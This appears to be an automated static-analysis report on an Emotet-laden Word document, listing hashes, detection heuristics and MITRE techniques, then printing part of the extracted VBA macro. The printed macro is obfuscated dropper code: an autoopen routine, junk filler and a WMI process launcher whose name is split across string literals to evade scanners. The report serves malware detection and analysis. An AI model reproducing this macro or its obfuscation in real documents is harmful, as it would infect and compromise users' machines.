Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 f0f7cfb434c2a392…

MALICIOUS

Office (OLE)

Size: 146.0 KB
Created: 2019-05-01 17:22:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 96cdf568dbc0321382662a802a070f84
SHA-1: c34034e98763cba603e04f391ce40fe60e4248a5
SHA-256: f0f7cfb434c2a3922d011186c1bfeeebf9cf5444b33cf90104ae09407bb65e06
Risk score: 342

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1218.011 System Binary Proxy Execution: Rundll32

The sample contains a VBA macro with an AutoOpen function, a common Emotet infection vector. Critical heuristics indicate the use of obfuscated API calls to launch processes via WMI, specifically reassembling the token 'winmgmts' to create a Win32_Process. This technique is used to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Dropper.Emotet-6959731-0'.

Heuristics (9)

  • ClamAV: Doc.Dropper.Emotet-6959731-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Emotet-6959731-0
  • VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE)
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) that appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • GetObject call (high, OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 20821 bytes
SHA-256: 0ec66599fe9e6142a4380a057e271016f0e9ef7b4fb974b0ed920e52d4f6b5ea

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "rBAXQAD"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "uAAoXAA"
Attribute VB_Base = "0{19096DCF-76A5-462A-8778-35A31E472F85}{F67B3265-E105-441A-AEF5-4F299B43ED7A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "kQXAkAA"

Attribute VB_Name = "hwQ_GcA"

Attribute VB_Name = "fAAAGo"

Attribute VB_Name = "wDAAAC"

Attribute VB_Name = "SwQD4wA"

Attribute VB_Name = "hAoAkUAA"

Attribute VB_Name = "NoAQAA"

Attribute VB_Name = "UQQkAUA"
Attribute VB_Base = "0{7A8C2520-D85A-44BB-9E2B-BA822CEDE871}{71ED6B25-321F-42E2-BDDB-385EF688550D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CAQxxQXB"
Function jAAA1A(aAUAZU)
   Select Case YAkAAX
Case 607876225
Minute CInt(551927326 _
- Tan(uB1AAck * Cos(XBAUAw1) + _
326604505 + 492602580))
End Select
   Select Case YwAAAA4U
Case 497481336
Minute CInt(32682802 _
- Tan(kACA_QAA * Cos(vAooAD) + _
316861906 + 836624005))
End Select
   Select Case rZACUD_
Case 301219825
Minute CInt(526668550 _
- Tan(jAAA_A * Cos(QxGDDAD) + _
122285024 + 489764712))
End Select
Set jAAA1A = CVar(aAUAZU)
   Select Case dAZDAAC
Case 659984310
Minute CInt(902748411 _
- Tan(FQAQ1w1 * Cos(UAAccDZw) + _
982009707 + 725700183))
End Select
   Select Case uGAwQAB
Case 652829185
Minute CInt(921928753 _
- Tan(n1ABQDD * Cos(wACQkADD) + _
260866299 + 635342689))
End Select
   Select Case lU_4QkAB
Case 763528613
Minute CInt(515481722 _
- Tan(FAZ_QA4 * Cos(wQA_XZkw) + _
132327666 + 664152383))
End Select
End Function
Sub autoopen()
   Select Case zoxkUxA
Case 92928073
Minute CInt(586238285 _
- Tan(T_AABQA * Cos(sAoABAU) + _
18523351 + 559651681))
End Select
   Select Case Q1AAAA
Case 632490481
Minute CInt(550323800 _
- Tan(j4X_QA * Cos(HAx1_AAA) + _
211856689 + 664281942))
End Select
Call ucAA_UZX
   Select Case TUUAAB
Case 157315451
Minute CInt(691318453 _
- Tan(LxDAAU * Cos(jB_BBB) + _
939458184 + 5790805))
End Select
   Select Case tAAwUAB_
Case 766343198
Minute CInt(311378348 _
- Tan(kc1BADAQ * Cos(ZXAGwAA4) + _
29514864 + 626480221))
End Select
   Select Case UkDkAAk
Case 252080057
Minute CInt(260540041 _
- Tan(kcAk14 * Cos(QQkAox) + _
850966018 + 986085129))
End Select
End Sub


Attribute VB_Name = "a_D1AoBo"
Function ucAA_UZX()
On Error Resume Next
   Select Case zAGAAD
Case 993877399
Minute CInt(139821193 _
- Tan(kA_xQAA * Cos(b_QBkAA4) + _
653640184 + 255202773))
End Select
   Select Case w1AAQA
Case 180959178
Minute CInt(271576555 _
- Tan(L1AAUx * Cos(JAAXwA) + _
856179382 + 801334810))
End Select
   Select Case nAxAAk
Case 904283128
Minute CInt(374407405 _
- Tan(XC1AAAAZ * Cos(hwDQBA) + _
183660370 + 917968827))
End Select
Set iCUAB1C = jAAA1A(GetObject("w" + "inmgmts:W" + "in32_Process" + "Sta" + "rtup"))
   Select Case dCAAQC1A
Case 201384195
Minute CInt(521324913 _
- Tan(fAwAcA * Cos(bAQZXCDc) + _
214979997 + 347130263))
End Select
   Select Case AQxAxZ1
Case 765570612
Minute CInt(423957614 _
- Tan(wAAkCZ * Cos(FB1AcA) + _
106555726 + 443733542))
End Select
   Select Case lABUAA_
Case 342706215
Minute CInt(304829962 _
- Tan(FGQXDZ4U * Cos(IA_BQDQo) + _
989855003 + 534143441))
End Select
BkA1ABAX = vbError - vbError
   Select Case VDAGUk
Case 564807639
Minute CInt(457366789 _
- Tan(pAGxBQ * Cos(cACDAX) + _
689260177 + 866757292))
End Select
   Select Case iXAD1AA
Case 959099938
Minute CInt(292045512 _
- Tan(fcZXBZ * Cos(uQAAQAB) + _
413918322 + 933936691))

... (truncated)